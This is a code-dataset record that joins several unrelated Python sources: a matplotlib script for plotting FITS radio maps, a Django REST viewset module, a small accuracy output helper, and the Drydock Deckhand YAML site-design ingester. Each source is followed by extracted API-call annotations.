vmin, vmax = np.min(img), np.max(img)
if norm == '':
norm = 'linear %.3f %.3f' % (vmin, vmax)
norm = get_normalize(norm, vmin, vmax)
fig, ax = plt.subplots()
fig.set_size_inches(figsize)
set_axis(ax, win)
add_beam(ax, win, h, bpos=bpos)
add_annotation(ax, annotationfile)
ax.contour(img, levs, extent=win,
linewidths=0.5, colors='k')
pcm = ax.imshow(img, extent=win, origin='lower',
interpolation='none', cmap=cmap, norm=norm)
cbar = fig.colorbar(pcm, ax=ax, fraction=fraction)
# cbar.ax.minorticks_off()
cbar.ax.tick_params('both',direction='in',right=True,top=True,which='both')
cbar.ax.tick_params(axis='y', labelrotation=90)
fig.tight_layout(pad=0.5)
if outfile != '':
savefig(outfile, dpi)
hdul.close()
def myhelp():
print('Help: mapplot.py -w "18 -8 -20 6" -f "7 6" -n "power 0.5" <cta102.fits> <1.8e-3>')
print(' or: mapplot.py -i cta102.fits -o cta102.png -w "18 -8 -20 6" -f "7 6" -n "power 0.5"')
def main(argv):
# infile = r'3c66a-calib/circe-beam.fits'
infile = ''
outfile = ''
annotationfile = ''
cmul = ''
win = None
levs = None
bpos = None
figsize = None
dpi = 100
colormap = ''
N_cut = 0
norm = ''
fraction = 0.05
try:
opts, args = getopt.getopt(argv, "hi:c:o:w:l:b:f:d:a:n:N:",
['help', 'infile=', 'cmul=', 'outfile=', 'win=',
'bpos=', 'figsize=', 'dpi=', 'annotatefile=', 'levs=', 'colormap=',
'N_cut=', 'norm=', 'fraction='])
except getopt.GetoptError:
myhelp()
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
myhelp()
elif opt in ('-i', '--infile'):
infile = arg
elif opt in ('-c', '--cmul'):
cmul = arg
elif opt in ('-o', '--outfile'):
outfile = arg
elif opt in ('-w', '--win'):
win = arg
elif opt in ('-l', '--levs'):
levs = np.array(arg.split(), dtype=np.float64).tolist()
elif opt in ('-b', '--bpos'):
bpos = np.array(arg.split(), dtype=np.float64).tolist()
elif opt in ('-f', '--figsize'):
figsize = np.array(arg.split(), dtype=np.float64).tolist()
elif opt in ('-d', '--dpi'):
dpi = int(arg)
elif opt in ('-a', '--annotatefile'):
annotationfile = arg
elif opt in ('--colormap', ):
colormap = arg
elif opt in ('-N', '--N_cut'):
N_cut = int(arg)
elif opt in ('-n', '--norm'):
norm = arg
elif opt in ('--fraction',):
fraction = float(arg)
if infile=='' and len(args)==2:
infile, cmul = args
if infile=='' and len(args)==3:
infile, outfile, cmul = args
if infile=='' and len(args)==4:
infile, outfile, cmul, win = args
if outfile == '':
outfile = infile.split('.')[0] + '.pdf'
cmul = float(cmul)
if type(win) == str:
win = np.array(win.split(), dtype=np.float64).tolist()
mapplot(infile, cmul, outfile=outfile, win=win, levs=levs, bpos=bpos,
figsize=figsize, dpi=dpi, annotationfile=annotationfile,
cmap=colormap, N_cut=N_cut, norm=norm, fraction=fraction)
if __name__ == '__main__' :
main(sys.argv[1:]) | [
"getopt.getopt",
"matplotlib.pyplot.savefig",
"sys.exit",
"matplotlib.colors.LogNorm",
"numpy.min",
"matplotlib.colors.ListedColormap",
"numpy.max",
"numpy.array",
"matplotlib.colors.PowerNorm",
"matplotlib.colors.SymLogNorm",
"astropy.table.Table.read",
"astropy.io.fits.open",
"matplotlib.colors.Normalize",
"matplotlib.patches.Ellipse",
"matplotlib.colors.TwoSlopeNorm",
"matplotlib.pyplot.subplots",
"numpy.arange",
"matplotlib.pyplot.get_cmap"
]
| [((1726, 1788), 'matplotlib.patches.Ellipse', 'Ellipse', (['bpos', 'bmaj', 'bmin'], {'angle': 'bpa', 'ec': '"""k"""', 'facecolor': '"""gray"""'}), "(bpos, bmaj, bmin, angle=bpa, ec='k', facecolor='gray')\n", (1733, 1788), False, 'from matplotlib.patches import Ellipse\n'), ((2198, 2216), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['cmap'], {}), '(cmap)\n', (2210, 2216), True, 'import matplotlib.pyplot as plt\n'), ((2283, 2318), 'matplotlib.colors.ListedColormap', 'mcolors.ListedColormap', (['color_index'], {}), '(color_index)\n', (2305, 2318), True, 'import matplotlib.colors as mcolors\n'), ((5830, 5847), 'astropy.io.fits.open', 'fits.open', (['infile'], {}), '(infile)\n', (5839, 5847), False, 'from astropy.io import fits\n'), ((6405, 6419), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (6417, 6419), True, 'import matplotlib.pyplot as plt\n'), ((1867, 1901), 'astropy.table.Table.read', 'Table.read', (['notefile'], {'format': '"""csv"""'}), "(notefile, format='csv')\n", (1877, 1901), False, 'from astropy.table import Table\n'), ((2222, 2243), 'numpy.arange', 'np.arange', (['N_cut', '(256)'], {}), '(N_cut, 256)\n', (2231, 2243), True, 'import numpy as np\n'), ((2403, 2432), 'matplotlib.colors.Normalize', 'mcolors.Normalize', (['vmin', 'vmax'], {}), '(vmin, vmax)\n', (2420, 2432), True, 'import matplotlib.colors as mcolors\n'), ((2570, 2605), 'matplotlib.colors.Normalize', 'mcolors.Normalize', (['vmin', 'vmax', '(True)'], {}), '(vmin, vmax, True)\n', (2587, 2605), True, 'import matplotlib.colors as mcolors\n'), ((5455, 5475), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outfile'], {}), '(outfile)\n', (5466, 5475), True, 'import matplotlib.pyplot as plt\n'), ((6270, 6281), 'numpy.min', 'np.min', (['img'], {}), '(img)\n', (6276, 6281), True, 'import numpy as np\n'), ((6283, 6294), 'numpy.max', 'np.max', (['img'], {}), '(img)\n', (6289, 6294), True, 'import numpy as np\n'), ((7457, 7661), 'getopt.getopt', 'getopt.getopt', (['argv', '"""hi:c:o:w:l:b:f:d:a:n:N:"""', "['help', 'infile=', 'cmul=', 'outfile=', 'win=', 'bpos=', 'figsize=',\n 'dpi=', 'annotatefile=', 'levs=', 'colormap=', 'N_cut=', 'norm=',\n 'fraction=']"], {}), "(argv, 'hi:c:o:w:l:b:f:d:a:n:N:', ['help', 'infile=', 'cmul=',\n 'outfile=', 'win=', 'bpos=', 'figsize=', 'dpi=', 'annotatefile=',\n 'levs=', 'colormap=', 'N_cut=', 'norm=', 'fraction='])\n", (7470, 7661), False, 'import getopt\n'), ((2530, 2560), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (2538, 2560), True, 'import numpy as np\n'), ((2839, 2881), 'matplotlib.colors.PowerNorm', 'mcolors.PowerNorm', (['gamma', 'vmin', 'vmax', '(True)'], {}), '(gamma, vmin, vmax, True)\n', (2856, 2881), True, 'import matplotlib.colors as mcolors\n'), ((5555, 5584), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outfile'], {'dpi': 'dpi'}), '(outfile, dpi=dpi)\n', (5566, 5584), True, 'import matplotlib.pyplot as plt\n'), ((5933, 6004), 'numpy.array', 'np.array', (['[-1, 1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096]'], {}), '([-1, 1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048, 4096])\n', (5941, 6004), True, 'import numpy as np\n'), ((7712, 7723), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (7720, 7723), False, 'import sys\n'), ((2978, 3005), 'matplotlib.colors.LogNorm', 'mcolors.LogNorm', (['vmin', 'vmax'], {}), '(vmin, vmax)\n', (2993, 3005), True, 'import matplotlib.colors as mcolors\n'), ((5627, 5656), 'matplotlib.pyplot.savefig', 'plt.savefig', (['outfile'], {'dpi': 'dpi'}), '(outfile, dpi=dpi)\n', (5638, 5656), True, 'import matplotlib.pyplot as plt\n'), ((2752, 2782), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (2760, 2782), True, 'import numpy as np\n'), ((2938, 2968), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (2946, 2968), True, 'import numpy as np\n'), ((3272, 3323), 'matplotlib.colors.SymLogNorm', 'mcolors.SymLogNorm', (['linthresh', 'linscale', 'vmin', 'vmax'], {}), '(linthresh, linscale, vmin, vmax)\n', (3290, 3323), True, 'import matplotlib.colors as mcolors\n'), ((3901, 3927), 'numpy.array', 'np.array', (['args'], {'dtype': '"""f4"""'}), "(args, dtype='f4')\n", (3909, 3927), True, 'import numpy as np\n'), ((3483, 3524), 'matplotlib.colors.TwoSlopeNorm', 'mcolors.TwoSlopeNorm', (['vcenter', 'vmin', 'vmax'], {}), '(vcenter, vmin, vmax)\n', (3503, 3524), True, 'import matplotlib.colors as mcolors\n'), ((4091, 4122), 'numpy.array', 'np.array', (['args[:-1]'], {'dtype': '"""f4"""'}), "(args[:-1], dtype='f4')\n", (4099, 4122), True, 'import numpy as np\n'), ((3143, 3173), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (3151, 3173), True, 'import numpy as np\n'), ((4313, 4339), 'numpy.array', 'np.array', (['args'], {'dtype': '"""f4"""'}), "(args, dtype='f4')\n", (4321, 4339), True, 'import numpy as np\n'), ((4348, 4422), 'matplotlib.patches.Ellipse', 'Ellipse', (['(x, y)', 'majax', 'minax'], {'angle': 'pa', 'lw': '(0.5)', 'fc': '"""none"""', 'ec': '"""k"""', 'ls': '"""-"""'}), "((x, y), majax, minax, angle=pa, lw=0.5, fc='none', ec='k', ls='-')\n", (4355, 4422), False, 'from matplotlib.patches import Ellipse\n'), ((3232, 3262), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (3240, 3262), True, 'import numpy as np\n'), ((3443, 3473), 'numpy.array', 'np.array', (['args[1:]'], {'dtype': '"""f4"""'}), "(args[1:], dtype='f4')\n", (3451, 3473), True, 'import numpy as np\n')] |
from rest_framework.viewsets import ModelViewSet,GenericViewSet
from rest_framework.response import Response
from api.serializers.domain import *
from api.pagination.page import MyPageNumberPagination
from api.models import *
class MDomainListViewSet(ModelViewSet):
queryset = MasterDomainName.objects.all().order_by('id')
pagination_class = MyPageNumberPagination
serializer_class = MDomainListSerializers
class DnsListViewSet(GenericViewSet):
def list(self, request, *args, **kwargs):
res = {"count": 0, 'results': None}
domain_id = request.query_params.get('domain')
dns_list = Dns.objects.all().filter(master_domain_name=domain_id)
dns_count = Dns.objects.all().filter(master_domain_name=domain_id).count()
page = MyPageNumberPagination()
page_dns_list = page.paginate_queryset(dns_list,request,self)
ser = DnsListSerializers(instance=page_dns_list,many=True)
res['results'] = ser.data
res['count'] = dns_count
return Response(res)
class DnsUpdataViewSet(ModelViewSet):
queryset = Dns.objects.all().order_by('id')
serializer_class = DnsUpdataSerializers
| [
"rest_framework.response.Response",
"api.pagination.page.MyPageNumberPagination"
]
| [((779, 803), 'api.pagination.page.MyPageNumberPagination', 'MyPageNumberPagination', ([], {}), '()\n', (801, 803), False, 'from api.pagination.page import MyPageNumberPagination\n'), ((1023, 1036), 'rest_framework.response.Response', 'Response', (['res'], {}), '(res)\n', (1031, 1036), False, 'from rest_framework.response import Response\n')] |
import json
from .accuracy_tool import gen_micro_macro_result
def null_output_function(data, config, *args, **params):
return ""
def basic_output_function(data, config, *args, **params):
which = config.get("output", "output_value").replace(" ", "").split(",")
temp = gen_micro_macro_result(data)
result = {}
for name in which:
result[name] = temp[name]
return json.dumps(result, sort_keys=True)
| [
"json.dumps"
]
| [((414, 448), 'json.dumps', 'json.dumps', (['result'], {'sort_keys': '(True)'}), '(result, sort_keys=True)\n', (424, 448), False, 'import json\n')] |
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This data ingester will consume YAML site topology documents."""
import yaml
import logging
import jsonschema
import os
import pkg_resources
import copy
import hashlib
import drydock_provisioner.objects.fields as hd_fields
from beaker.cache import CacheManager
from beaker.util import parse_cache_config_options
from drydock_provisioner import error as errors
from drydock_provisioner import objects
from drydock_provisioner.ingester.plugins import IngesterPlugin
cache_opts = {
'cache.type': 'memory',
'expire': 1800,
}
cache = CacheManager(**parse_cache_config_options(cache_opts))
class DeckhandIngester(IngesterPlugin):
def __init__(self):
super().__init__()
self.logger = logging.getLogger('drydock.ingester.deckhand')
self.load_schemas()
def get_name(self):
return "deckhand"
def ingest_data(self, **kwargs):
"""Parse and save design data.
:param content: String of valid Deckhand YAML
:returns: a tuple of a status response and a list of parsed objects from drydock_provisioner.objects
"""
def local_parse():
return self.parse_docs(kwargs.get('content'))
if 'content' in kwargs:
try:
# Hash the input to use as the cache key. This is not a security
# related hash, so use cheap and fast MD5
hv = hashlib.md5(kwargs.get('content', b'')).hexdigest()
local_cache = cache.get_cache('parsed_docs')
results = local_cache.get(key=hv, createfunc=local_parse)
parse_status, models = results
except Exception as ex:
self.logger.debug("Error parsing design - hash %s", hv, exc_info=ex)
raise ex
else:
raise ValueError('Missing parameter "content"')
return parse_status, models
def parse_docs(self, doc_blob):
"""Translate a YAML string into the internal Drydock model.
Returns a tuple of a objects.TaskStatus instance to summarize all
document processing and a list of models yielded by successful processing
:param doc_blob: bytes representing a utf-8 encoded YAML string
"""
models = []
yaml_string = doc_blob.decode()
self.logger.debug("yamlingester:parse_docs - Parsing YAML string.")
try:
parsed_data = yaml.safe_load_all(yaml_string)
except yaml.YAMLError as err:
if hasattr(err, 'problem_mark'):
mark = err.problem_mark
raise errors.IngesterError(
"Error parsing YAML at (l:%s, c:%s): %s" %
(mark.line + 1, mark.column + 1, err))
else:
raise errors.IngesterError("Error parsing YAML: %s" % (err))
# tracking processing status to provide a complete summary of issues
ps = objects.Validation()
ps.set_status(hd_fields.ValidationResult.Success)
for d in parsed_data:
try:
(schema_ns, doc_kind, doc_version) = d.get('schema',
'').split('/')
except ValueError as ex:
self.logger.error(
"Error with document structure.", exc_info=ex)
self.logger.debug("Error document\n%s" % yaml.dump(d))
continue
if schema_ns == 'drydock':
try:
doc_ref = objects.DocumentReference(
doc_type=hd_fields.DocumentType.Deckhand,
doc_schema=d.get('schema'),
doc_name=d.get('metadata', {}).get('name', 'Unknown'))
doc_errors = self.validate_drydock_document(d)
if len(doc_errors) > 0:
for e in doc_errors:
ps.add_detail_msg(
objects.ValidationMessage(
msg="%s:%s schema validation error: %s" %
(doc_kind, doc_version, e),
name="DD001",
docs=[doc_ref],
error=True,
level=hd_fields.MessageLevels.ERROR,
diagnostic=
"Invalid input file - see Drydock Troubleshooting Guide for DD001"
))
ps.set_status(hd_fields.ActionResult.Failure)
continue
model = self.process_drydock_document(d)
model.doc_ref = doc_ref
models.append(model)
except errors.IngesterError as ie:
msg = "Error processing document: %s" % str(ie)
self.logger.warning(msg)
ps.add_detail_msg(
objects.ValidationMessage(
msg=msg,
name="DD000",
error=True,
level=hd_fields.MessageLevels.ERROR,
docs=[doc_ref],
diagnostic="Exception during document processing "
"- see Drydock Troubleshooting Guide "
"for DD000"))
ps.set_status(hd_fields.ActionResult.Failure)
except Exception as ex:
msg = "Unexpected error processing document: %s" % str(ex)
self.logger.error(msg, exc_info=True)
ps.add_detail_msg(
objects.ValidationMessage(
msg=msg,
name="DD000",
error=True,
level=hd_fields.MessageLevels.ERROR,
docs=[doc_ref],
diagnostic="Unexpected exception during document "
"processing - see Drydock Troubleshooting "
"Guide for DD000"))
ps.set_status(hd_fields.ActionResult.Failure)
return (ps, models)
def process_drydock_document(self, doc):
"""Process a parsed YAML document.
:param doc: The dictionary from parsing the YAML document
"""
(schema_ns, kind, version) = doc.get('schema', '').split('/')
if version == 'v1':
doc_processor = DeckhandIngester.v1_doc_handlers.get(kind, None)
else:
doc_processor = None
if doc_processor is None:
raise errors.IngesterError(
"Invalid document - Kind %s and Version %s" % (kind, version))
metadata = doc.get('metadata', {})
doc_name = metadata.get('name')
return doc_processor(self, doc_name, doc.get('data', {}))
def validate_drydock_document(self, doc):
"""Validate a parsed document via jsonschema.
If a schema for a document Kind is not available, the document is
considered valid. Schema is chosen by the doc['kind'] field.
Returns a empty list for valid documents, otherwise returns a list
of all found errors
:param doc: dictionary of the parsed document.
"""
schemaname = doc.get('schema', '')
(schema_ns, doc_kind, doc_version) = schemaname.split('/')
errors_found = []
if doc_version == 'v1':
if schemaname in self.v1_doc_schemas:
validator = jsonschema.Draft4Validator(
self.v1_doc_schemas.get(schemaname))
for error in validator.iter_errors(doc.get('data', [])):
errors_found.append(error.message)
return errors_found
def process_drydock_region(self, name, data):
"""Process the data/spec section of a Region document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.Site()
# Need to add validation logic, we'll assume the input is
# valid for now
model.name = name
model.status = hd_fields.SiteStatus.Unknown
model.source = hd_fields.ModelSource.Designed
model.tag_definitions = objects.NodeTagDefinitionList()
tag_defs = data.get('tag_definitions', [])
for t in tag_defs:
tag_model = objects.NodeTagDefinition()
tag_model.tag = t.get('tag', '')
tag_model.type = t.get('definition_type', '')
tag_model.definition = t.get('definition', '')
if tag_model.type not in ['lshw_xpath']:
raise errors.IngesterError(
'Unknown definition_type in '
'tag_definition instance: %s' % (t.definition_type))
model.tag_definitions.append(tag_model)
auth_keys = data.get('authorized_keys', [])
model.authorized_keys = [k for k in auth_keys]
repos = data.get('repositories', None)
if repos:
model.repositories = self.process_drydock_region_repo_list(repos)
return model
def process_drydock_region_repo_list(self, data):
"""Process a package repository list.
:param data: The data from the ``repositories`` key in a Region document
"""
model = objects.RepositoryList()
for k, v in data.items():
if k == 'remove_unlisted':
model.remove_unlisted = v
else:
model.append(objects.Repository(name=k, **v))
return model
def process_drydock_rack(self, name, data):
"""Process the data/spec section of a Rack document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.Rack()
model.source = hd_fields.ModelSource.Designed
model.name = name
model.tor_switches = objects.TorSwitchList()
tors = data.get('tor_switches', {})
for k, v in tors.items():
tor = objects.TorSwitch()
tor.switch_name = k
tor.mgmt_ip = v.get('mgmt_ip', None)
tor.sdn_api_uri = v.get('sdn_api_url', None)
model.tor_switches.append(tor)
model.location = copy.deepcopy(data.get('location', {}))
model.local_networks = [n for n in data.get('local_networks', [])]
return model
def process_drydock_networklink(self, name, data):
"""Process the data/spec section of a NetworkLink document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.NetworkLink()
model.source = hd_fields.ModelSource.Designed
model.name = name
model.metalabels = data.get('labels', {})
bonding = data.get('bonding', {})
model.bonding_mode = bonding.get(
'mode', hd_fields.NetworkLinkBondingMode.Disabled)
if model.bonding_mode in \
(hd_fields.NetworkLinkBondingMode.LACP,
hd_fields.NetworkLinkBondingMode.RoundRobin,
hd_fields.NetworkLinkBondingMode.Standby):
model.bonding_mon_rate = bonding.get('mon_rate', '100')
model.bonding_up_delay = bonding.get('up_delay', '200')
model.bonding_down_delay = bonding.get('down_delay', '200')
if model.bonding_mode == hd_fields.NetworkLinkBondingMode.LACP:
model.bonding_xmit_hash = bonding.get('hash', 'layer3+4')
model.bonding_peer_rate = bonding.get('peer_rate', 'fast')
model.mtu = data.get('mtu', None)
model.linkspeed = data.get('linkspeed', None)
trunking = data.get('trunking', {})
model.trunk_mode = trunking.get(
'mode', hd_fields.NetworkLinkTrunkingMode.Disabled)
model.native_network = trunking.get('default_network', None)
model.allowed_networks = data.get('allowed_networks', None)
return model
def process_drydock_network(self, name, data):
"""Process the data/spec section of a Network document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.Network()
model.source = hd_fields.ModelSource.Designed
model.name = name
model.metalabels = data.get('labels', {})
model.cidr = data.get('cidr', None)
model.vlan_id = data.get('vlan', None)
model.mtu = data.get('mtu', None)
model.routedomain = data.get('routedomain', None)
dns = data.get('dns', {})
model.dns_domain = dns.get('domain', 'local')
model.dns_servers = dns.get('servers', None)
ranges = data.get('ranges', [])
model.ranges = []
for r in ranges:
model.ranges.append({
'type': r.get('type', None),
'start': r.get('start', None),
'end': r.get('end', None),
})
routes = data.get('routes', [])
model.routes = []
for r in routes:
model.routes.append({
'subnet': r.get('subnet', None),
'gateway': r.get('gateway', None),
'metric': r.get('metric', None),
'routedomain': r.get('routedomain', None),
})
dhcp_relay = data.get('dhcp_relay', None)
if dhcp_relay is not None:
model.dhcp_relay_self_ip = dhcp_relay.get('self_ip', None)
model.dhcp_relay_upstream_target = dhcp_relay.get(
'upstream_target', None)
return model
def process_drydock_hwprofile(self, name, data):
"""Process the data/spec section of a HardwareProfile document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.HardwareProfile()
model.name = name
model.source = hd_fields.ModelSource.Designed
model.vendor = data.get('vendor', None)
model.generation = data.get('generation', None)
model.hw_version = data.get('hw_version', None)
model.bios_version = data.get('bios_version', None)
model.boot_mode = data.get('boot_mode', None)
model.bootstrap_protocol = data.get('bootstrap_protocol', None)
model.pxe_interface = data.get('pxe_interface', None)
model.devices = objects.HardwareDeviceAliasList()
device_aliases = data.get('device_aliases', {})
for d, v in device_aliases.items():
dev_model = objects.HardwareDeviceAlias()
dev_model.source = hd_fields.ModelSource.Designed
dev_model.alias = d
dev_model.bus_type = v.get('bus_type', None)
dev_model.dev_type = v.get('dev_type', None)
dev_model.address = v.get('address', None)
model.devices.append(dev_model)
model.cpu_sets = data.get('cpu_sets', None) or dict()
model.hugepages_confs = objects.HugepagesConfList()
for c, d in data.get('hugepages', {}).items():
conf = objects.HugepagesConf(
name=c, size=d.get('size'), count=d.get('count'))
model.hugepages_confs.append(conf)
return model
def process_drydock_hostprofile(self, name, data):
"""Process the data/spec section of a HostProfile document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.HostProfile()
model.name = name
model.source = hd_fields.ModelSource.Designed
self.process_host_common_fields(data, model)
return model
def process_drydock_bootaction(self, name, data):
"""Process the data/spec section of a BootAction document.
:param name: the document name attribute
:Param data: the dictionary of the parsed data/spec section
"""
model = objects.BootAction()
model.name = name
model.source = hd_fields.ModelSource.Designed
assets = data.get('assets')
model.asset_list = objects.BootActionAssetList()
for a in assets:
ba = self.process_bootaction_asset(a)
model.asset_list.append(ba)
node_filter = data.get('node_filter', None)
if node_filter is not None:
nfs = self.process_bootaction_nodefilter(node_filter)
model.node_filter = nfs
model.signaling = data.get('signaling', None)
return model
def process_bootaction_asset(self, asset_dict):
"""Process a dictionary representing a BootAction Data Asset.
:param asset_dict: dictionary representing the bootaction asset
"""
model = objects.BootActionAsset(**asset_dict)
return model
def process_bootaction_nodefilter(self, nf):
"""Process a dictionary representing a BootAction NodeFilter Set.
:param nf: dictionary representing the bootaction nodefilter set.
"""
model = objects.NodeFilterSet()
model.filter_set_type = nf.get('filter_set_type', None)
model.filter_set = []
for nf in nf.get('filter_set', []):
nf_model = objects.NodeFilter(**nf)
model.filter_set.append(nf_model)
return model
def process_drydock_node(self, name, data):
"""Process the data/spec section of a BaremetalNode document.
:param name: the document name attribute
:param data: the dictionary of the data/spec section
"""
model = objects.BaremetalNode()
model.name = name
model.source = hd_fields.ModelSource.Designed
self.process_host_common_fields(data, model)
node_metadata = data.get('metadata', {})
model.boot_mac = node_metadata.get('boot_mac', None)
addresses = data.get('addressing', [])
if len(addresses) == 0:
raise errors.IngesterError('BaremetalNode needs at least'
' 1 assigned address')
model.addressing = objects.IpAddressAssignmentList()
for a in addresses:
assignment = objects.IpAddressAssignment()
address = a.get('address', '')
if address == 'dhcp':
assignment.type = 'dhcp'
assignment.address = None
assignment.network = a.get('network')
model.addressing.append(assignment)
elif address != '':
assignment.type = 'static'
assignment.address = a.get('address')
assignment.network = a.get('network')
model.addressing.append(assignment)
else:
self.log.error("Invalid address assignment %s on Node %s" %
(address, self.name))
return model
def process_host_common_fields(self, data, model):
"""Process fields common to the host-based documents.
Update the provided model with the values of fields common
to BaremetalNode and HostProfile documents.
:param data: dictionary from YAML parsing of the document data/spec section
:param model: instance of objects.HostProfile or objects.BaremetalNode to update
"""
model.parent_profile = data.get('host_profile', None)
model.hardware_profile = data.get('hardware_profile', None)
oob = data.get('oob', {})
model.oob_parameters = {}
for k, v in oob.items():
if k == 'type':
model.oob_type = oob.get('type', None)
else:
model.oob_parameters[k] = v
(model.storage_devices,
model.volume_groups) = self.process_node_storage(
data.get('storage', {}))
interfaces = data.get('interfaces', {})
model.interfaces = objects.HostInterfaceList()
for k, v in interfaces.items():
int_model = objects.HostInterface()
# A null value indicates this interface should be removed
# from any parent profiles
if v is None:
int_model.device_name = '!' + k
continue
int_model.device_name = k
int_model.network_link = v.get('device_link', None)
int_model.hardware_slaves = []
slaves = v.get('slaves', [])
for s in slaves:
int_model.hardware_slaves.append(s)
int_model.networks = []
networks = v.get('networks', [])
for n in networks:
int_model.networks.append(n)
if 'sriov' in v:
int_model.sriov = True
int_model.vf_count = v.get('sriov', {}).get('vf_count', 0)
int_model.trustedmode = v.get('sriov', {}).get(
'trustedmode', False)
model.interfaces.append(int_model)
platform = data.get('platform', {})
model.image = platform.get('image', None)
model.kernel = platform.get('kernel', None)
model.kernel_params = {}
for k, v in platform.get('kernel_params', {}).items():
model.kernel_params[k] = v
model.primary_network = data.get('primary_network', None)
node_metadata = data.get('metadata', {})
metadata_tags = node_metadata.get('tags', [])
model.tags = metadata_tags
owner_data = node_metadata.get('owner_data', {})
model.owner_data = {}
for k, v in owner_data.items():
model.owner_data[k] = v
model.rack = node_metadata.get('rack', None)
return model
def process_node_storage(self, storage):
"""Process the storage data for a node-based document.
Return a tuple of of two lists the first is a StorageDeviceList, the
second is a VolumeGroupList.
:param storage: dictionary of the storage section of a document
"""
phys_devs = storage.get('physical_devices', {})
storage_devices = objects.HostStorageDeviceList()
for k, v in phys_devs.items():
sd = objects.HostStorageDevice(name=k)
sd.source = hd_fields.ModelSource.Designed
if 'labels' in v:
sd.labels = v.get('labels').copy()
if 'volume_group' in v:
vg = v.get('volume_group')
sd.volume_group = vg
elif 'partitions' in v:
sd.partitions = objects.HostPartitionList()
for vv in v.get('partitions', []):
part_model = objects.HostPartition()
part_model.name = vv.get('name')
part_model.source = hd_fields.ModelSource.Designed
part_model.part_uuid = vv.get('part_uuid', None)
part_model.size = vv.get('size', None)
if 'labels' in vv:
part_model.labels = vv.get('labels').copy()
if 'volume_group' in vv:
part_model.volume_group = vv.get('vg')
elif 'filesystem' in vv:
fs_info = vv.get('filesystem', {})
part_model.mountpoint = fs_info.get('mountpoint', None)
part_model.fstype = fs_info.get('fstype', 'ext4')
part_model.mount_options = fs_info.get(
'mount_options', 'defaults')
part_model.fs_uuid = fs_info.get('fs_uuid', None)
part_model.fs_label = fs_info.get('fs_label', None)
sd.partitions.append(part_model)
storage_devices.append(sd)
volume_groups = objects.HostVolumeGroupList()
vol_groups = storage.get('volume_groups', {})
for k, v in vol_groups.items():
vg = objects.HostVolumeGroup(name=k)
vg.vg_uuid = v.get('vg_uuid', None)
vg.logical_volumes = objects.HostVolumeList()
volume_groups.append(vg)
for vv in v.get('logical_volumes', []):
lv = objects.HostVolume(name=vv.get('name'))
lv.size = vv.get('size', None)
lv.lv_uuid = vv.get('lv_uuid', None)
if 'filesystem' in vv:
fs_info = vv.get('filesystem', {})
lv.mountpoint = fs_info.get('mountpoint', None)
lv.fstype = fs_info.get('fstype', 'ext4')
lv.mount_options = fs_info.get('mount_options', 'defaults')
lv.fs_uuid = fs_info.get('fs_uuid', None)
lv.fs_label = fs_info.get('fs_label', None)
vg.logical_volumes.append(lv)
return (storage_devices, volume_groups)
def load_schemas(self):
self.v1_doc_schemas = dict()
schema_dir = self._get_schema_dir()
for schema_file in os.listdir(schema_dir):
f = open(os.path.join(schema_dir, schema_file), 'r')
for schema in yaml.safe_load_all(f):
schema_for = schema['metadata']['name']
if schema_for in self.v1_doc_schemas:
self.logger.warning(
"Duplicate document schemas found for document kind %s."
% schema_for)
self.logger.debug(
"Loaded schema for document kind %s." % schema_for)
self.v1_doc_schemas[schema_for] = schema.get('data')
f.close()
def _get_schema_dir(self):
return pkg_resources.resource_filename('drydock_provisioner',
'schemas')
# Mapping of handlers for different document kinds
v1_doc_handlers = {
'Region': process_drydock_region,
'Rack': process_drydock_rack,
'NetworkLink': process_drydock_networklink,
'Network': process_drydock_network,
'HardwareProfile': process_drydock_hwprofile,
'HostProfile': process_drydock_hostprofile,
'BaremetalNode': process_drydock_node,
'BootAction': process_drydock_bootaction,
}
| [
"logging.getLogger",
"drydock_provisioner.objects.NodeTagDefinition",
"drydock_provisioner.objects.HostVolumeGroupList",
"drydock_provisioner.objects.HostVolumeGroup",
"drydock_provisioner.objects.ValidationMessage",
"drydock_provisioner.objects.IpAddressAssignmentList",
"drydock_provisioner.objects.BootAction",
"drydock_provisioner.objects.HardwareDeviceAlias",
"drydock_provisioner.objects.HostProfile",
"drydock_provisioner.objects.IpAddressAssignment",
"drydock_provisioner.error.IngesterError",
"os.listdir",
"drydock_provisioner.objects.Validation",
"drydock_provisioner.objects.BootActionAsset",
"drydock_provisioner.objects.HostStorageDeviceList",
"drydock_provisioner.objects.HardwareDeviceAliasList",
"drydock_provisioner.objects.BaremetalNode",
"drydock_provisioner.objects.HostVolumeList",
"drydock_provisioner.objects.HardwareProfile",
"drydock_provisioner.objects.HostStorageDevice",
"drydock_provisioner.objects.Site",
"drydock_provisioner.objects.TorSwitch",
"drydock_provisioner.objects.BootActionAssetList",
"drydock_provisioner.objects.RepositoryList",
"drydock_provisioner.objects.Network",
"drydock_provisioner.objects.HostInterfaceList",
